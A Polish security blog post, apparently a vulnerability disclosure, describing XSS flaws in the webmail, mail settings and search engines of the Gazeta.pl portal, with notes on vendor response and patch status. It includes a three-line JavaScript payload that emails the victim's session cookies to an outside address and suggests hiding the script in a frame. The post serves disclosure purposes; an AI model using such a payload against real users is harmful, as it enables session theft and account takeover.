Aplikacje internetowe

Bełdziowe spojrzenie na aplikacje internetowe

Dziurawa Gazeta

O Gazeta.pl

Portal Gazeta.pl jest jednym z największych serwisów internetowych w Polsce. Korzysta z niego co trzeci polski internauta. Jego siłą są serwisy informacyjne i tematyczne – przygotowywane wspólnie z innymi mediami Agory – oraz unikalna społeczność użytkowników. Agora prowadzi również internetowy serwis ogłoszeń Aaaby.pl

Błędy

1. XSS w module odpowiedzi poczty.

Jeżli w treści odebranej wiadomości znajduje się kod HTML wszelkie znaki specjalne zamieniane są na encje dzięki czemu możliwe jest poprawne wyświetlenie kodu. Jednak gdy odpowiemy na wiadomość, która zawiera kod HTML znaki specjalne nie zostaną zamienione na encje co skutkuje wykonaniem kodu.

Brak filtracji treści podczas odpowiedzi umożliwia nam również wykonanie kodu JavaScript. Przykładem wykorzystania błędu może być poniższy kod:

document.getElementsByName("mailTo")[0].value = "beldzio@beldzio.com";
document.getElementsByName("mailBody")[0].value = document.cookie;
document.getElementsByName("Send")[0].click( );

Jego zadaniem jest wysłanie na podany adres e-mail ciastek użytkownika.

Jako, że kod JS uruchamiany jest lokalnie mam praktycznie nieograniczone możliwości co do jego wykonania. Możemy np. utworzyć ramkę, w której nasz skrypt będzie pracował niezauważenie dla użytkownika.

2. XSS w ustawieniach poczty.

2.1 Ustawienia skrzynki pocztowej.

Na tej podstronie znajdują się 4 pola tekstowe z czego treść wpisywana do dwóch z nich (Znak cytowania przy odpowiedzi oraz Nagłówek przy odpowiedzi ) nie jest filtrowania.

2.2 Podpis.

2.x Reszta.

Tak samo jak powyższe kontrolki tekstowe tak i zdecydowania większość w poczcie Gazety nie są filtrowanie dzięki czemu mamy możliwość wykonania kodu działającego po stronie klienta.

3. XSS w wyszukiwarkach.

Na stronie Gazety znajduje się pięć wyszukiwarek: Internet, Gazeta.pl, Katalog, Forum, Archiwum GW. Wszystkie one są podatne na XSS.

Odpowiedź

Brak

Poprawki

Wyszukiwarka załatana, poczta nadal dziurawa.


Tagi: ,
Kategoria: Bezpieczeństwo, BugTraq


2 komentarze

  1. fajny artykuł , tylko niestety nie ma już zdjęć.

  2. thx poprawione :) coś się prawa do katalogu zmieniły przy upgrade WP :)

Dodaj komentarz